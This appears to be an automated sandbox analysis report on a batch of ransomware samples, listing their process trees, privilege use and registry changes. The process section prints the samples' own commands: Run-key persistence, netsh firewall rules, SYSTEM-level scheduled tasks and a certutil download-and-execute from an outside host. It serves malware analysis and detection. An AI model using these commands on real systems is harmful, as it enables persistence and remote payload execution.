\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" csrss.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 5816 schtasks.exe 5512 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exetaskmgr.exepowershell.exepid process 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4176 powershell.exe 4176 powershell.exe 4176 powershell.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 2632 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepowershell.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exeHEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exeTrojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exedescription pid process Token: SeRestorePrivilege 4324 7zFM.exe Token: 35 4324 7zFM.exe Token: SeSecurityPrivilege 4324 7zFM.exe Token: SeDebugPrivilege 4820 taskmgr.exe Token: SeSystemProfilePrivilege 4820 taskmgr.exe Token: SeCreateGlobalPrivilege 4820 taskmgr.exe Token: SeDebugPrivilege 2632 taskmgr.exe Token: SeSystemProfilePrivilege 2632 taskmgr.exe Token: SeCreateGlobalPrivilege 2632 taskmgr.exe Token: 33 4820 taskmgr.exe Token: SeIncBasePriorityPrivilege 4820 taskmgr.exe Token: SeDebugPrivilege 4176 powershell.exe Token: SeDebugPrivilege 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe Token: SeDebugPrivilege 2664 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe Token: SeImpersonatePrivilege 2664 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe Token: SeDebugPrivilege 1412 Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepid process 4324 7zFM.exe 4324 7zFM.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exetaskmgr.exepid process 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 4820 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe 2632 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
cmd.exepid process 2780 cmd.exe 2780 cmd.exe 2780 cmd.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
taskmgr.exepowershell.execmd.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exeTrojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exeHEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.execmd.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.execmd.execmd.exedescription pid process target process PID 4820 wrote to memory of 2632 4820 taskmgr.exe taskmgr.exe PID 4820 wrote to memory of 2632 4820 taskmgr.exe taskmgr.exe PID 4176 wrote to memory of 2780 4176 powershell.exe cmd.exe PID 4176 wrote to memory of 2780 4176 powershell.exe cmd.exe PID 2780 wrote to memory of 3388 2780 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe PID 2780 wrote to memory of 3388 2780 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe PID 2780 wrote to memory of 3388 2780 cmd.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe PID 2780 wrote to memory of 2664 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe PID 2780 wrote to memory of 2664 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe PID 2780 wrote to memory of 2664 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe PID 2780 wrote to memory of 2668 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe PID 2780 wrote to memory of 2668 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe PID 2780 wrote to memory of 2668 2780 cmd.exe HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe PID 2668 wrote to memory of 1252 2668 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe cmd.exe PID 2668 wrote to memory of 1252 2668 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe cmd.exe PID 2668 wrote to memory of 1252 2668 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe cmd.exe PID 2780 wrote to memory of 1412 2780 cmd.exe Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe PID 2780 wrote to memory of 1412 2780 cmd.exe Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe PID 2780 wrote to memory of 1412 2780 cmd.exe Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe PID 2780 wrote to memory of 5160 2780 cmd.exe Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe PID 2780 wrote to memory of 5160 2780 cmd.exe Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe PID 2780 wrote to memory of 5160 2780 cmd.exe Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe PID 5160 wrote to memory of 5340 5160 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe PID 5160 wrote to memory of 5340 5160 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe PID 5160 wrote to memory of 5340 5160 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe PID 2780 wrote to memory of 5444 2780 cmd.exe Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe PID 2780 wrote to memory of 5444 2780 cmd.exe Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe PID 2780 wrote to memory of 5444 2780 cmd.exe Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe PID 4572 wrote to memory of 1664 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe cmd.exe PID 4572 wrote to memory of 1664 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe cmd.exe PID 1664 wrote to memory of 1616 1664 cmd.exe netsh.exe PID 1664 wrote to memory of 1616 1664 cmd.exe netsh.exe PID 3388 wrote to memory of 4648 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe cmd.exe PID 3388 wrote to memory of 4648 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe cmd.exe PID 3388 wrote to memory of 4648 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe cmd.exe PID 4572 wrote to memory of 2044 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe cmd.exe PID 4572 wrote to memory of 2044 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe cmd.exe PID 4648 wrote to memory of 5148 4648 cmd.exe reg.exe PID 4648 wrote to memory of 5148 4648 cmd.exe reg.exe PID 4648 wrote to memory of 5148 4648 cmd.exe reg.exe PID 2044 wrote to memory of 3040 2044 cmd.exe Conhost.exe PID 2044 wrote to memory of 3040 2044 cmd.exe Conhost.exe PID 4572 wrote to memory of 632 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe csrss.exe PID 4572 wrote to memory of 632 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe csrss.exe PID 4572 wrote to memory of 632 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe csrss.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00396.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4324
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\task.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\task.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5148
-
-
-
C:\Users\Admin\AppData\Roaming\task.exe"C:\Users\Admin\AppData\Roaming\task.exe"4⤵PID:6072
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\task.exe"5⤵PID:5068
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\task.exe"6⤵PID:5916
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"5⤵PID:4880
-
-
-
-
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exeHEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe"C:\Users\Admin\Desktop\00396\HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\88b4290b01c8\88b4290b01c8.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\88b4290b01c8\88b4290b01c8.exe" enable=yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3040
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:632 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Scheduled Task/Job: Scheduled Task
PID:5816
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F6⤵
- Scheduled Task/Job: Scheduled Task
PID:5512
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵PID:4468
-
-
